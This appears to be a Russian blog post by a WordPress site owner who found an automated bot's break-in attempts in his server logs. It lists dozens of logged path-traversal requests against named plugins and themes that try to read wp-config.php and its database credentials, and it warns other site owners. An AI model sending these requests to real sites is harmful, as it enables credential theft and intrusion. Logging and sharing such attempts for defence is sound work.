Список уязвимых плагинов и тем WordPress

Примечание: Этот текст может содержать некоторые партнерские ссылки, а это значит, что я зарабатываю небольшую комиссию без каких-либо дополнительных затрат с вашей стороны, если вы воспользуетесь этими ссылками. Спасибо за понимание и поддержку.

В течение часа выследил попытку взлома моего сайта со стороны автоматического бота-скрипта, который методом «тыка» ищет на моем сайте уязвимость через «коряво» написанные плагины и темы WordPress.

Запрос, который я нашел в логах сервера, показал мне «уязвимую» тему WordPress под названием Yakimabait.

Более детальный анализ логов сервера за последние несколько дней дал мне целый список «уязвимых» плагинов и тем WordPress, через слабый код которых бот пытается получить доступ к файлу конфигурации wp-config.php, чтобы считать логи доступа к базе данных. Красиво, да?

Вот вам полный список «уязвимых» тем и плагинов. Возможно, найдете то, что стоит у вас.

/wp-content/force-download.php?file=../wp-config.php HTTP/1.1
/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php HTTP/1.1
/wp-content/plugins/filedownload/download.php/?path=../../../wp-config.php HTTP/1.1
/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php HTTP/1.1
/wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../wp-config.php HTTP/1.1
/wp-content/plugins/plugin-newsletter/preview.php?data=../../../../wp-config.php HTTP/1.1
/wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=../../../../wp-config.php HTTP/1.1
/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php HTTP/1.1
/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php HTTP/1.1
/wp-content/themes/Newspapertimes_1/download.php?filename=../../../wp-config.php HTTP/1.1
/wp-content/themes/SMWF/inc/download.php?file=../../../../wp-config.php HTTP/1.1
/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php HTTP/1.1
/wp-content/themes/acento/includes/view-pdf.php?download=1&file=../../../../wp-config.php HTTP/1.1
/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php HTTP/1.1
/wp-content/themes/corporate_works/downloader.php?file_download=../../../wp-config.php HTTP/1.1
/wp-content/themes/felis/download.php?file=../../../wp-config.php HTTP/1.1
/wp-content/themes/jarida/download.php?uri=../../../wp-config.php HTTP/1.1
/wp-content/themes/lote27/download.php?download=../../../wp-config.php HTTP/1.1
/wp-content/themes/markant/download.php?file=../../../wp-config.php HTTP/1.1
/wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php HTTP/1.1
/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php HTTP/1.1
/wp-content/themes/tess/download.php?file=../../../wp-config.php HTTP/1.1
/wp-content/themes/yakimabait/download.php?file=../../../wp-config.php HTTP/1.1
/wp-content/themes/ypo-theme/download.php?download=../../../wp-config.php HTTP/1.1
/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php
/wp-content/themes/yakimabait/download.php?file=./wp-config.php
/wp-content/themes/markant/download.php?file=../../wp-config.php
/wp-content/themes/SMWF/inc/download.php?file=../wp-config.php
/force-download.php?file=../wp-config.php
/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php
/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php
/wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/wp-config.php
/wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/wp-config.php
/wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/wp-config.php
/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php
/wp-content/themes/lote27/download.php?download=../../../wp-config.php
/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
/wp-content/themes/epic/includes/download.php?file=wp-config.php
/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php
/wp-content/themes/felis/download.php?file=../wp-config.php
/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php
/wp-content/themes/yakimabait/download.php?file=./wp-config.php
/wp-content/themes/markant/download.php?file=../../wp-config.php
/wp-content/themes/SMWF/inc/download.php?file=../wp-config.php
/force-download.php?file=../wp-config.php
/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php
/wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/wp-config.php
/wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/wp-config.php
/wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/wp-config.php
/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php
/wp-content/themes/lote27/download.php?download=../../../wp-config.php
/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
/wp-content/themes/epic/includes/download.php?file=wp-config.php
/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php
/wp-content/themes/felis/download.php?file=../wp-config.php

Все эти запросы шли с одного испанского IP.

IP я закрыл через .htaccess

Будьте бдительны!

Важно! Эта запись может содержать ссылки на плагины, которые к моменту вашего чтения и скачивания могут работать не корректно. Будьте внимательны.

Добавить комментарий

Ваш email нигде не будет показан. Обязательные поля помечены *